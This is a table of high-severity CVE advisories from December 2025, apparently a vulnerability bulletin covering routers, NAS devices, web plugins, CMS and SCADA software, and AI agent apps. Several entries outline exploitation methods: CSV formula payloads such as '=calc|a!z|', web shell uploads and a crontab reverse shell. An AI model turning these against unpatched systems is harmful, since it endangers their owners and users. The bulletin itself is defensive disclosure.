| Shiguangwu--sgwbox N3 | A vulnerability was determined in Shiguangwu sgwbox N3 2.0.25. This affects an unknown function of the component SHARESERVER Feature. This manipulation of the argument params causes command injection. The attack can be initiated remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-15 | 9.8 | CVE-2025-14705 | VDB-336422 | Shiguangwu sgwbox N3 SHARESERVER Feature command injection VDB-336422 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #706974 | sgwbox N3 NAS V2.0.25 Command Injection https://www.notion.so/sgwbox-NAS-N3-Command-Injection-2be6cf4e528a80d69da5d6d17456a183?source=copy_link |
| Shiguangwu--sgwbox N3 | A vulnerability was identified in Shiguangwu sgwbox N3 2.0.25. This impacts an unknown function of the file /usr/sbin/http_eshell_server of the component NETREBOOT Interface. Such manipulation leads to command injection. The attack can be launched remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-15 | 9.8 | CVE-2025-14706 | VDB-336423 | Shiguangwu sgwbox N3 NETREBOOT http_eshell_server command injection VDB-336423 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #706975 | sgwbox N3 NAS V2.0.25 Command Injection https://www.notion.so/sgwbox-NAS-N3-Command-Injection-2be6cf4e528a807cb619f9d2e1bcda20?source=copy_link |
| Shiguangwu--sgwbox N3 | A security flaw has been discovered in Shiguangwu sgwbox N3 2.0.25. Affected is an unknown function of the file /usr/sbin/http_eshell_server of the component DOCKER Feature. Performing manipulation of the argument params results in command injection. The attack may be initiated remotely. The exploit has been released to the public and may be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-15 | 9.8 | CVE-2025-14707 | VDB-336424 | Shiguangwu sgwbox N3 DOCKER Feature http_eshell_server command injection VDB-336424 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #706976 | sgwbox N3 NAS V2.0.25 Command Injection https://www.notion.so/sgwbox-NAS-N3-Command-Injection-2be6cf4e528a805f9b94f7b8799c77a8?source=copy_link |
| Shiguangwu--sgwbox N3 | A weakness has been identified in Shiguangwu sgwbox N3 2.0.25. Affected by this vulnerability is an unknown functionality of the file /usr/sbin/http_eshell_server of the component WIREDCFGGET Interface. Executing manipulation of the argument params can lead to buffer overflow. The attack may be launched remotely. The exploit has been made available to the public and could be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-15 | 9.8 | CVE-2025-14708 | VDB-336425 | Shiguangwu sgwbox N3 WIREDCFGGET http_eshell_server buffer overflow VDB-336425 | CTI Indicators (IOB, IOC, IOA) Submit #706977 | sgwbox N3 NAS V2.0.25 Buffer Overflow https://www.notion.so/sgwbox-NAS-N3-Buffer-Overflow-2be6cf4e528a808b9f71fe434929c73b?source=copy_link |
| Shiguangwu--sgwbox N3 | A security vulnerability has been detected in Shiguangwu sgwbox N3 2.0.25. Affected by this issue is some unknown functionality of the file /usr/sbin/http_eshell_server of the component WIRELESSCFGGET Interface. The manipulation of the argument params leads to buffer overflow. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-15 | 9.8 | CVE-2025-14709 | VDB-336426 | Shiguangwu sgwbox N3 WIRELESSCFGGET http_eshell_server buffer overflow VDB-336426 | CTI Indicators (IOB, IOC, IOA) Submit #706989 | sgwbox N3 NAS V2.0.25 Buffer Overflow https://www.notion.so/sgwbox-NAS-N3-Buffer-Overflow-2be6cf4e528a80258b82dee0d6d1ebd1?source=copy_link |
| Tenda--WH450 | A security flaw has been discovered in Tenda WH450 1.0.0.18. This impacts an unknown function of the file /goform/wirelessRestart of the component HTTP Request Handler. The manipulation of the argument GO results in stack-based buffer overflow. The attack may be performed from remote. The exploit has been released to the public and may be exploited. | 2025-12-18 | 9.8 | CVE-2025-14878 | VDB-337369 | Tenda WH450 HTTP Request wirelessRestart stack-based overflow VDB-337369 | CTI Indicators (IOB, IOC, IOA) Submit #715357 | Tenda WH450 V1.0.0.18 Stack-based Buffer Overflow https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/wirelessRestart/wirelessRestart.md https://www.tenda.com.cn/ |
| Tenda--WH450 | A weakness has been identified in Tenda WH450 1.0.0.18. Affected is an unknown function of the file /goform/onSSIDChange of the component HTTP Request Handler. This manipulation of the argument ssid_index causes stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be exploited. | 2025-12-18 | 9.8 | CVE-2025-14879 | VDB-337370 | Tenda WH450 HTTP Request onSSIDChange stack-based overflow VDB-337370 | CTI Indicators (IOB, IOC, IOA) Submit #715362 | Tenda WH450 V1.0.0.18 Stack-based Buffer Overflow https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/onSSIDChange/onSSIDChange.md https://www.tenda.com.cn/ |
| TOTOLINK--T10 | A vulnerability has been found in TOTOLINK T10 4.1.8cu.5083_B20200521. This affects the function sprintf of the file /cgi-bin/cstecgi.cgi. Such manipulation of the argument loginAuthUrl leads to stack-based buffer overflow. The attack may be performed from remote. | 2025-12-19 | 9.8 | CVE-2025-14964 | VDB-337599 | TOTOLINK T10 cstecgi.cgi sprintf stack-based overflow VDB-337599 | CTI Indicators (IOB, IOC, IOA) Submit #717720 | TOTOLINK T10 V2_Firmware V4.1.8cu.5083_B20200521 Buffer Overflow https://github.com/JackWesleyy/CVE/blob/main/TOTOLINK_T10_BOC.md https://www.totolink.net/ |
| Restajet Information Technologies Inc.--Online Food Delivery System | Improper Restriction of Excessive Authentication Attempts vulnerability in Restajet Information Technologies Inc. Online Food Delivery System allows Password Recovery Exploitation.This issue affects Online Food Delivery System: through 19122025. | 2025-12-19 | 9.1 | CVE-2025-1928 | https://www.usom.gov.tr/bildirim/tr-25-0469 |
| NVIDIA--Isaac Lab | NVIDIA Isaac Lab contains a deserialization vulnerability. A successful exploit of this vulnerability might lead to code execution. | 2025-12-16 | 9 | CVE-2025-33210 | https://nvd.nist.gov/vuln/detail/CVE-2025-33210 https://www.cve.org/CVERecord?id=CVE-2025-33210 https://nvidia.custhelp.com/app/answers/detail/a_id/5733 |
| Qualcomm, Inc.--Snapdragon | Memory Corruption when a corrupted ELF image with an oversized file size is read into a buffer without authentication. | 2025-12-18 | 9 | CVE-2025-47372 | https://docs.qualcomm.com/product/publicresources/securitybulletin/december-2025-bulletin.html |
| AmentoTech--Tuturn | Authentication Bypass Using an Alternate Path or Channel vulnerability in AmentoTech Tuturn allows Authentication Abuse.This issue affects Tuturn: from n/a before 3.6. | 2025-12-18 | 9.8 | CVE-2025-64236 | https://vdp.patchstack.com/database/wordpress/plugin/tuturn/vulnerability/wordpress-tuturn-plugin-3-6-broken-authentication-vulnerability?_s_id=cve |
| Microsoft--Azure Cognitive Service for Language | Custom Question Answering Elevation of Privilege Vulnerability | 2025-12-18 | 9.9 | CVE-2025-64663 | Custom Question Answering Elevation of Privilege Vulnerability |
| OpenAgentPlatform--Dive | Dive is an open-source MCP Host Desktop Application that enables integration with function-calling LLMs. A critical Stored Cross-Site Scripting (XSS) vulnerability exists in versions prior to 0.11.1 in the Mermaid diagram rendering component. The application allows the execution of arbitrary JavaScript via `javascript:`. An attacker can exploit this to inject a malicious Model Context Protocol (MCP) server configuration, leading to Remote Code Execution (RCE) on the victim's machine when the node is clicked. Version 0.11.1 fixes the issue. | 2025-12-19 | 9.7 | CVE-2025-66580 | https://github.com/OpenAgentPlatform/Dive/security/advisories/GHSA-xv8m-365j-x6h2 |
| ThinkInAIXYZ--deepchat | DeepChat is an open-source artificial intelligence agent platform that unifies models, tools, and agents. Prior to version 0.5.3, a security vulnerability exists in the Mermaid diagram rendering component that allows arbitrary JavaScript execution. Due to the exposure of the Electron IPC renderer to the DOM, this Cross-Site Scripting (XSS) flaw escalates to full Remote Code Execution (RCE), allowing an attacker to execute arbitrary system commands. Two concurrent issues, unsafe Mermaid configuration and an exposed IPC interface, cause this issue. Version 0.5.3 contains a patch. | 2025-12-16 | 9.7 | CVE-2025-67744 | https://github.com/ThinkInAIXYZ/deepchat/security/advisories/GHSA-w8w8-82pv-5rg9 https://github.com/ThinkInAIXYZ/deepchat/commit/b179d97921af04a0ae1ae68757338dd8b8cbefe7 |
| ChurchCRM--CRM | ChurchCRM is an open-source church management system. In versions prior to 6.5.3, the Database Restore functionality does not validate the content or file extension of uploaded files. As a result, an attacker can upload a web shell file and subsequently upload a .htaccess file to enable direct access to it. Once accessed, the uploaded web shell allows remote code execution (RCE) on the server. Version 6.5.3 fixes the issue. | 2025-12-17 | 9.1 | CVE-2025-68109 | https://github.com/ChurchCRM/CRM/security/advisories/GHSA-pqm7-g8px-9r77 |
| ChurchCRM--CRM | ChurchCRM is an open-source church management system. In versions prior to 6.5.3, a SQL injection vulnerability in ChurchCRM's Event Attendee Editor allows authenticated users to execute arbitrary SQL commands, leading to complete database compromise, administrative credential theft, and potential system takeover. The vulnerability enables attackers to extract sensitive member data, authentication credentials, and financial information from the church management system. Version 6.5.3 contains a patch for the issue. | 2025-12-17 | 9.6 | CVE-2025-68112 | https://github.com/ChurchCRM/CRM/security/advisories/GHSA-hxf4-3vhp-wqcq |
| openedx--edx-platform | The Open edX Platform is a learning management platform. Prior to commit 05d0d0936daf82c476617257aa6c35f0cd4ca060, CourseLimitedStaffRole users are able to access and edit courses in studio if they are granted the role on an org rather than on a course, and CourseLimitedStaffRole users are able to list courses they have the role on in studio even though they are not meant to have any access on the studio side for the course. Commit 05d0d0936daf82c476617257aa6c35f0cd4ca060 fixes the issue. | 2025-12-16 | 9.9 | CVE-2025-68270 | https://github.com/openedx/edx-platform/security/advisories/GHSA-rh64-vc2h-7wfj https://github.com/openedx/edx-platform/pull/37772 https://github.com/openedx/edx-platform/pull/37773 https://github.com/openedx/edx-platform/commit/05d0d0936daf82c476617257aa6c35f0cd4ca060 |
| WeblateOrg--weblate | Weblate is a web based localization tool. In versions prior to 5.15.1, it was possible to overwrite Git configuration remotely and override some of its behavior. Version 5.15.1 fixes the issue. | 2025-12-18 | 9.1 | CVE-2025-68398 | https://github.com/WeblateOrg/weblate/security/advisories/GHSA-8vcg-cfxj-p5m3 https://github.com/WeblateOrg/weblate/pull/17330 https://github.com/WeblateOrg/weblate/pull/17345 https://github.com/WeblateOrg/weblate/releases/tag/weblate-5.15.1 |
| nicotsx--zerobyte | Zerobyte is a backup automation tool Zerobyte versions prior to 0.18.5 and 0.19.0 contain an authentication bypass vulnerability where authentication middleware is not properly applied to API endpoints. This results in certain API endpoints being accessible without valid session credentials. This is dangerous for those who have exposed Zerobyte to be used outside of their internal network. A fix has been applied in both version 0.19.0 and 0.18.5. If immediate upgrade is not possible, restrict network access to the Zerobyte instance to trusted networks only using firewall rules or network segmentation. This is only a temporary mitigation; upgrading is strongly recommended. | 2025-12-17 | 9.1 | CVE-2025-68435 | https://github.com/nicotsx/zerobyte/security/advisories/GHSA-x539-c98q-38gv https://github.com/nicotsx/zerobyte/issues/161 https://github.com/nicotsx/zerobyte/commit/13e080a18967705bd2b4e110e5f7693fdca1c692 |
| Kentico--Xperience | An unrestricted file upload vulnerability in Kentico Xperience allows authenticated users with 'Read data' permissions to upload arbitrary file types via MVC form file uploader components. Attackers can manipulate file names and upload potentially malicious files to the system, enabling unauthorized file uploads. | 2025-12-18 | 8.8 | CVE-2019-25229 | Kentico DevNet Hotfixes VulnCheck Advisory: Kentico Xperience <= 12.0.29 MVC Forms Unrestricted File Upload |
| Kentico--Xperience | A SQL injection vulnerability in Kentico Xperience allows authenticated editors to inject malicious SQL queries via online marketing macro method parameters. This enables unauthorized database access and potential data manipulation by exploiting macro method input validation weaknesses. | 2025-12-18 | 8.8 | CVE-2021-47711 | Kentico DevNet Hotfixes VulnCheck Advisory: Kentico Xperience <= 13.0.52 Online Marketing Macros SQL Injection |
| spip--spip | Spip 4.1.10 contains a file upload vulnerability that allows attackers to upload malicious SVG files with embedded external links. Attackers can trick administrators into clicking a crafted SVG logo that redirects to a potentially dangerous URL through improper file upload filtering. | 2025-12-16 | 8.8 | CVE-2023-53900 | ExploitDB-51557 SPIP Product Webpage VulnCheck Advisory: Spip 4.1.10 Admin Account Spoofing via Malicious SVG Upload |
| projectSend--projectSend | ProjectSend r1605 contains a CSV injection vulnerability that allows authenticated users to inject malicious formulas into user profile names. Attackers can craft payloads like =calc|a!z| in the name field to trigger code execution when administrators export action logs as CSV files. | 2025-12-17 | 8.8 | CVE-2023-53905 | ExploitDB-51517 Official Product Homepage VulnCheck Advisory: ProjectSend r1605 CSV Injection via User Account Export Functionality |
| Rukovoditel--Rukovoditel | Rukovoditel 3.3.1 contains a CSV injection vulnerability that allows authenticated users to inject malicious formulas into the firstname field. Attackers can craft payloads like =calc|a!z| to trigger code execution when an admin exports customer data as a CSV file. | 2025-12-17 | 8.8 | CVE-2023-53913 | ExploitDB-51490 Official Product Webpage VulnCheck Advisory: Rukovoditel 3.3.1 CSV Injection via User Account Export |
| Ulicms--Ulicms | UliCMS 2023.1-sniffing-vicuna contains a remote code execution vulnerability that allows authenticated attackers to upload PHP files with .phar extension during profile avatar upload. Attackers can trigger code execution by visiting the uploaded file's location, enabling system command execution through maliciously crafted avatar uploads. | 2025-12-17 | 8.8 | CVE-2023-53924 | ExploitDB-51434 Archived Product Webpage VulnCheck Advisory: UliCMS 2023.1-sniffing-vicuna Remote Code Execution via Avatar Upload |
| PHPJabbers--Simple CMS | PHPJabbers Simple CMS 5.0 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts through section name parameters. Attackers can create sections with embedded JavaScript payloads that will execute when administrators view the sections, potentially enabling client-side code execution. | 2025-12-17 | 8.8 | CVE-2023-53927 | ExploitDB-51415 Official Product Homepage VulnCheck Advisory: PHPJabbers Simple CMS 5.0 Stored Cross-Site Scripting via Section Creation |
| Phpmyfaq--phpMyFAQ | phpMyFAQ 3.1.12 contains a CSV injection vulnerability that allows authenticated users to inject malicious formulas into their profile names. Attackers can modify their user profile name with a payload like 'calc|a!z|' to trigger code execution when an administrator exports user data as a CSV file. | 2025-12-17 | 8.8 | CVE-2023-53929 | ExploitDB-51399 Official Product Homepage VulnCheck Advisory: phpMyFAQ 3.1.12 CSV Injection via User Profile Export |
| s9y--Serendipity | Serendipity 2.4.0 contains a remote code execution vulnerability that allows authenticated attackers to upload malicious PHP files with .phar extension. Attackers can upload files with system command payloads to the media upload endpoint and execute arbitrary commands on the server. | 2025-12-17 | 8.8 | CVE-2023-53933 | ExploitDB-51372 Official Product Homepage VulnCheck Advisory: Serendipity 2.4.0 Authenticated Remote Code Execution via File Upload |
| leefish--File Thingie | File Thingie 2.5.7 contains an authenticated file upload vulnerability that allows remote attackers to upload malicious PHP zip archives to the web server. Attackers can create a custom PHP payload, upload and unzip it, and then execute arbitrary system commands through a crafted PHP script with a command parameter. | 2025-12-18 | 8.8 | CVE-2023-53942 | ExploitDB-51436 Product GitHub Repository VulnCheck Advisory: File Thingie 2.5.7 Authenticated Arbitrary File Upload Remote Code Execution |
| brainycp--BrainyCP | BrainyCP 1.0 contains an authenticated remote code execution vulnerability that allows logged-in users to inject arbitrary commands through the crontab configuration interface. Attackers can exploit the crontab endpoint by adding a malicious command that spawns a reverse shell to a specified IP and port. | 2025-12-19 | 8.8 | CVE-2023-53945 | ExploitDB-51357 Official Product Homepage VulnCheck Advisory: BrainyCP 1.0 Remote Code Execution via Authenticated Crontab Manipulation |
| Arcsoft--PhotoStudio | Arcsoft PhotoStudio 6.0.0.172 contains an unquoted service path vulnerability in the ArcSoft Exchange Service that allows local attackers to escalate privileges. Attackers can place a malicious executable in the unquoted path and trigger the service to execute arbitrary code with system-level permissions. | 2025-12-19 | 8.4 | CVE-2023-53946 | ExploitDB-51393 Official Product Homepage VulnCheck Advisory: Arcsoft PhotoStudio 6.0.0.172 Unquoted Service Path Privilege Escalation |
| oscinventory--OCS Inventory NG | OCS Inventory NG 2.3.0.0 contains an unquoted service path vulnerability that allows local attackers to escalate privileges to system level. Attackers can place a malicious executable in the unquoted service path and trigger the service restart to execute code with elevated system privileges. | 2025-12-19 | 8.4 | CVE-2023-53947 | ExploitDB-51389 Official Product Homepage VulnCheck Advisory: OCS Inventory NG 2.3.0.0 Unquoted Service Path Privilege Escalation |
| Aspemail--AspEmail | AspEmail 5.6.0.2 contains a binary permission vulnerability that allows local users to escalate privileges through the Persits Software EmailAgent service. Attackers can exploit full write permissions in the BIN directory to replace the service executable and gain elevated system access. | 2025-12-19 | 8.4 | CVE-2023-53949 | ExploitDB-51380 Official Product Homepage VulnCheck Advisory: AspEmail 5.6.0.2 Local Privilege Escalation via Binary Permission Vulnerability |
| Dotclear--Dotclear | Dotclear 2.25.3 contains a remote code execution vulnerability that allows authenticated attackers to upload malicious PHP files with .phar extension through the blog post creation interface. Attackers can upload files containing PHP system commands that execute when the uploaded file is accessed, enabling arbitrary code execution on the server. | 2025-12-19 | 8.8 | CVE-2023-53952 | ExploitDB-51353 Official Product Homepage VulnCheck Advisory: Dotclear 2.25.3 Authenticated Remote Code Execution via File Upload |
| altervista--flatnux | Flatnux 2021-03.25 contains an authenticated file upload vulnerability that allows administrative users to upload arbitrary PHP files through the file manager. Attackers with admin credentials can upload malicious PHP scripts to the web root directory, enabling remote code execution on the server. | 2025-12-19 | 8.8 | CVE-2023-53956 | ExploitDB-51295 Official Product Homepage VulnCheck Advisory: Flatnux 2021-03.25 Authenticated File Upload Remote Code Execution |
| Red Hat--Red Hat Lightspeed (formerly Insights) for Runtimes 1.0 | A flaw was found in runtimes-inventory-rhel8-operator. An internal proxy component is incorrectly configured. Because of this flaw, the proxy attaches the cluster's main administrative credentials to any command it receives, instead of only the specific reports it is supposed to handle. This allows a standard user within the cluster to send unauthorized commands to the management platform, effectively acting with the full permissions of the cluster administrator. This could lead to unauthorized changes to the cluster's configuration or status on the Red Hat platform. | 2025-12-15 | 8.7 | CVE-2025-11393 | RHSA-2025:23236 https://access.redhat.com/security/cve/CVE-2025-11393 RHBZ#2402032 |
| Mitsubishi Electric Corporation--GENESIS64 | Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in the software keyboard function (hereinafter referred to as "keypad function") of Mitsubishi Electric GENESIS64 versions 10.97.2 CFR3 and prior, Mitsubishi Electric Iconics Digital Solutions GENESIS64 versions 10.97.2 CFR3 and prior, Mitsubishi Electric ICONICS Suite versions 10.97.2 CFR3 and prior, Mitsubishi Electric Iconics Digital Solutions ICONICS Suite versions 10.97.2 CFR3 and prior, Mitsubishi Electric MobileHMI versions 10.97.2 CFR3 and prior, Mitsubishi Electric Iconics Digital Solutions MobileHMI versions 10.97.2 CFR3 and prior, and Mitsubishi Electric MC Works64 all versions allows a local attacker to execute arbitrary executable files (EXE) when a legitimate user uses the keypad function by tampering with the configuration file for the function. This could allow the attacker to disclose, tamper with, delete, or destroy information stored on the PC where the affected product is installed, or cause a denial-of-service (DoS) condition on the system, through the execution of the EXE. | 2025-12-19 | 8.2 | CVE-2025-11774 | https://jvn.jp/vu/JVNVU97729686/ https://www.mitsubishielectric.com/psirt/vulnerability/pdf/2025-018_en.pdf |
| smub--Photo Gallery, Sliders, Proofing and Themes NextGEN Gallery | The Photo Gallery, Sliders, Proofing and Themes - NextGEN Gallery plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.59.12 via the 'template' shortcode parameter. This is due to insufficient path validation that allows absolute paths to be provided. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary PHP files on the server, bypassing web server restrictions like .htaccess. Successful exploitation could lead to information disclosure, code execution in the WordPress context, and potential remote code execution if combined with arbitrary file upload capabilities. | 2025-12-18 | 8.8 | CVE-2025-13641 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0a01e1c9-67f4-4cc1-b58b-9cc141889d66?source=cve https://plugins.trac.wordpress.org/browser/nextgen-gallery/trunk/src/DisplayType/LegacyTemplateLocator.php#L152 https://plugins.trac.wordpress.org/browser/nextgen-gallery/trunk/src/DisplayType/Controller.php#L369 https://plugins.trac.wordpress.org/changeset/3415575/nextgen-gallery/trunk/src/DisplayType/LegacyTemplateLocator.php?old=3004370&old_path=nextgen-gallery%2Ftrunk%2Fsrc%2FDisplayType%2FLegacyTemplateLocator.php |
| Foxit Software Inc.--Foxit PDF Reader | A local privilege escalation vulnerability exists in the Foxit PDF Reader/Editor Update Service. During plugin installation, incorrect file system permissions are assigned to resources used by the update service. A local attacker with low privileges could modify or replace these resources, which are later executed by the service, resulting in execution of arbitrary code with SYSTEM privileges. | 2025-12-19 | 8.8 | CVE-2025-13941 | https://www.foxit.com/support/security-bulletins.html |
| whyun--WPCOM Member | The WPCOM Member plugin for WordPress is vulnerable to authentication bypass via brute force in all versions up to, and including, 1.7.16. This is due to weak OTP (One-Time Password) generation using only 6 numeric digits combined with a 10-minute validity window and no rate limiting on verification attempts. This makes it possible for unauthenticated attackers to brute-force the verification code and authenticate as any user, including administrators, if they know the target's phone number, and the target does not notice or ignores the SMS notification with the OTP. | 2025-12-16 | 8.1 | CVE-2025-14002 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4f02ee56-40bd-4132-92e1-e2897ff2a4c4?source=cve https://plugins.trac.wordpress.org/browser/wpcom-member/tags/1.7.16/includes/class-sesstion.php#L29 https://plugins.trac.wordpress.org/browser/wpcom-member/tags/1.7.16/includes/member-functions.php#L833 https://plugins.trac.wordpress.org/changeset/3411048/wpcom-member |
| Radiometer Medical Aps--ABL90 FLEX and ABL90 FLEX PLUS Analyzers | A vulnerability exists in multiple Radiometer products that allow an attacker with physical access to the analyzer possibility to extract credential information. The vulnerability is due to a weakness in the design and insufficient credential protection in operating system. Other related CVE's are CVE-2025-14095 & CVE-2025-14097. Affected customers have been informed about this vulnerability. This CVE is being published to provide transparency. Required Configuration for Exposure: Attacker requires physical access to the analyzer. Temporary work Around: Only authorized people can physically access the analyzer. Permanent solution: Local Radiometer representatives will contact all affected customers to discuss a permanent solution. Exploit Status: Researchers have provided a working proof-of-concept (PoC). Radiometer is not aware of any public exploit code at the time of this publication. | 2025-12-17 | 8.4 | CVE-2025-14096 | https://www.radiometer.com/myradiometer |
| kraftplugins--Demo Importer Plus | The Demo Importer Plus plugin for WordPress is vulnerable to unauthorized modification of data, loss of data, and privilege escalation due to a missing capability check on the Ajax::handle_request() function in all versions up to, and including, 2.0.8. This makes it possible for authenticated attackers, with Subscriber-level access and above, to trigger a full site reset, dropping all database tables except users/usermeta and re-running wp_install(), which also assigns the Administrator role to the attacking subscriber account. | 2025-12-18 | 8.8 | CVE-2025-14364 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ff9364a9-18f8-47d3-b992-e39c8d99d6ea?source=cve https://plugins.trac.wordpress.org/changeset/3420645/demo-importer-plus/trunk/inc/Ajax.php |
| Red Hat--Red Hat OpenShift Container Platform 4 | A flaw was found in ose-openshift-apiserver. This vulnerability allows internal network enumeration, service discovery, limited information disclosure, and potential denial-of-service (DoS) through Server-Side Request Forgery (SSRF) due to missing IP address and network-range validation when processing user-supplied image references. | 2025-12-16 | 8.5 | CVE-2025-14443 | https://access.redhat.com/security/cve/CVE-2025-14443 RHBZ#2420964 https://github.com/tuxerrante/openshift-ssrf |
| F5--NGINX Ingress Controller | A vulnerability exists in NGINX Ingress Controller's nginx.org/rewrite-target annotation validation. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated. | 2025-12-17 | 8.3 | CVE-2025-14727 | https://my.f5.com/manage/s/article/K000158176 |
| themeisle--Redirection for Contact Form 7 | The Redirection for Contact Form 7 plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'move_file_to_upload' function in all versions up to, and including, 3.2.7. This makes it possible for unauthenticated attackers to copy arbitrary files on the affected site's server. If 'allow_url_fopen' is set to 'On', it is possible to upload a remote file to the server. | 2025-12-21 | 8.1 | CVE-2025-14800 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b249ec90-a364-4644-94fb-d42eb6cc4d9a?source=cve https://plugins.trac.wordpress.org/changeset/3423970/wpcf7-redirect https://plugins.trac.wordpress.org/browser/wpcf7-redirect/tags/3.2.7/classes/class-wpcf7r-save-files.php#L180 |
| Advantech--WebAccess/SCADA | Advantech WebAccess/SCADA is vulnerable to unrestricted file upload, which may allow an attacker to remotely execute arbitrary code. | 2025-12-18 | 8.8 | CVE-2025-14849 | https://www.advantech.com/en-us/support/details/installation?id=1-MS9MJV https://www.cisa.gov/news-events/ics-advisories/icsa-25-352-06 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-352-06.json |
| Advantech--WebAccess/SCADA | Advantech WebAccess/SCADA is vulnerable to directory traversal, which may allow an attacker to delete arbitrary files. | 2025-12-18 | 8.1 | CVE-2025-14850 | https://www.advantech.com/en-us/support/details/installation?id=1-MS9MJV https://www.cisa.gov/news-events/ics-advisories/icsa-25-352-06 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-352-06.json |
| Tenda--AC18 | A security vulnerability has been detected in Tenda AC18 15.03.05.05. The impacted element is the function strcpy of the file /goform/GetParentControlInfo of the component HTTP Request Handler. The manipulation of the argument mac leads to stack-based buffer overflow. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used. | 2025-12-21 | 8.8 | CVE-2025-14992 | VDB-337686 | Tenda AC18 HTTP Request GetParentControlInfo strcpy stack-based overflow VDB-337686 | CTI Indicators (IOB, IOC, IOA) Submit #719073 | Tenda AC18 V1.0 15.03.05.05 Stack-based Buffer Overflow https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_AC18/GetParentControlInfo/GetParentControlInfo.md https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_AC18/GetParentControlInfo/GetParentControlInfo.md#reproduce https://www.tenda.com.cn/ |
| Tenda--AC18 | A vulnerability was detected in Tenda AC18 15.03.05.05. This affects the function sprintf of the file /goform/SetDlnaCfg of the component HTTP Request Handler. The manipulation of the argument scanList results in stack-based buffer overflow. The attack can be executed remotely. The exploit is now public and may be used. | 2025-12-21 | 8.8 | CVE-2025-14993 | VDB-337687 | Tenda AC18 HTTP Request SetDlnaCfg sprintf stack-based overflow VDB-337687 | CTI Indicators (IOB, IOC, IOA) Submit #719084 | Tenda AC18 V1.0 15.03.05.05 Stack-based Buffer Overflow https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_AC18/SetDlnaCfg/SetDlnaCfg.md https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_AC18/SetDlnaCfg/SetDlnaCfg.md#reproduce https://www.tenda.com.cn/ |
| Tenda--FH1201 | A flaw has been found in Tenda FH1201 and FH1206 1.2.0.14(408)/1.2.0.8(8155). This impacts the function strcat of the file /goform/webtypelibrary of the component HTTP Request Handler. This manipulation of the argument webSiteId causes stack-based buffer overflow. The attack is possible to be carried out remotely. The exploit has been published and may be used. | 2025-12-21 | 8.8 | CVE-2025-14994 | VDB-337688 | Tenda FH1201/FH1206 HTTP Request webtypelibrary strcat stack-based overflow VDB-337688 | CTI Indicators (IOB, IOC, IOA) Submit #719153 | Tenda FH1201 V1.2.0.14(408) Stack-based Buffer Overflow Submit #719155 | Tenda FH1206 1.2.0.8(8155) Stack-based Buffer Overflow (Duplicate) https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_FH1201/webtyplibrary/webtypelibrary.md https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_FH1206/webtyplibrary/webtypelibrary.md https://www.tenda.com.cn/ |
| Tenda--FH1201 | A vulnerability has been found in Tenda FH1201 1.2.0.14(408). Affected is the function sprintf of the file /goform/SetIpBind. Such manipulation of the argument page leads to stack-based buffer overflow. The attack may be performed from remote. The exploit has been disclosed to the public and may be used. | 2025-12-21 | 8.8 | CVE-2025-14995 | VDB-337689 | Tenda FH1201 SetIpBind sprintf stack-based overflow VDB-337689 | CTI Indicators (IOB, IOC, IOA) Submit #719154 | Tenda FH1201 V1.2.0.14(408) Stack-based Buffer Overflow https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_FH1201/SetIpBind/SetIpBind.md https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_FH1201/SetIpBind/SetIpBind.md#reproduce https://www.tenda.com.cn/ |
| NVIDIA--Resiliency Extension | NVIDIA Resiliency Extension for Linux contains a vulnerability in log aggregation, where an attacker could cause predictable log-file names. A successful exploit of this vulnerability may lead to escalation of privileges, code execution, denial of service, information disclosure, and data tampering. | 2025-12-16 | 8.4 | CVE-2025-33225 | https://nvd.nist.gov/vuln/detail/CVE-2025-33225 https://www.cve.org/CVERecord?id=CVE-2025-33225 https://nvidia.custhelp.com/app/answers/detail/a_id/5746 |
| Nozomi Networks--Guardian | A Stored Cross-Site Scripting vulnerability was discovered in the Reports functionality due to improper validation of an input parameter. An authenticated user with report privileges can define a malicious report containing a JavaScript payload, or a victim can be socially engineered to import a malicious report template. When the victim views or imports the report, the XSS executes in their browser context, allowing the attacker to perform unauthorized actions as the victim, such as modify application data, disrupt application availability, and access limited sensitive information. | 2025-12-18 | 8.9 | CVE-2025-40892 | https://security.nozominetworks.com/NN-2025:13-01 |
| Nozomi Networks--Guardian | A path traversal vulnerability was discovered in the Import Arc data archive functionality due to insufficient validation of the input file. An authenticated user with limited privileges, by uploading a specifically-crafted Arc data archive, can potentially write arbitrary files in arbitrary paths, altering the device configuration and/or affecting its availability. | 2025-12-18 | 8.1 | CVE-2025-40898 | https://security.nozominetworks.com/NN-2025:15-01 |
